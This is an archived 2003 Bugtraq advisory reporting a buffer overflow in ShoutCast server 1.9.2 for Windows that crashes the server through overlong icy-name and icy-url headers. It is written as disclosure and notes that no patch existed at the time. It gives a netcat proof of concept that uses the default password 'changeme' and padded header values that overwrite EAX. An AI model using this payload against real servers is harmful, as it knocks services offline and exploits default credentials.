lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Mon, 3 Nov 2003 00:42:15 +0300 From: HEX <hex@..._net_ru.securityfocus.com> To: bugtraq@...urityfocus.com, support@...utcast.com, tom@...utcast.com Subject: ShoutCast server 1.9.2/win32 Informations : °°°°°°°°°°°° Language : Microsoft Visual C++ v5.0/v6.0 (MFC) Bugged Version : ShoutCast server 1.9.2/win32 (and less ?) Patched version : none Website : http://www.shoutcast.com Problems : DoS if we know the password from the server Objects : °°°°°°° - sc_serv.exe vulnerable variable: icy-name(Server Desc) and icy-url(Stream URL) Exploits : °°°°°°°° >nc target 8001 changeme icy-name:AAA...[Ax275]BBBB[rewrite EAX] icy-genre:DoS radio icy-url:AAA...[Ax288]BBBB[rewrite EAX] icy-pub:1 icy-irc:N/A icy-icq:N/A icy-aim:N/A icy-br:160 ... stream audio data ... P.S. Default password "changeme" !!! Patch/More Details : °°°°°°°°°°°°°°°°°° Waiting for the patch at http://www.shoutcast.com ... [ Local time 16:14 | Device not ready - девица не готова! ] [ Copyright by [HEX] | mailto: hex(a)hex.net.ru ]
Powered by blists - more mailing lists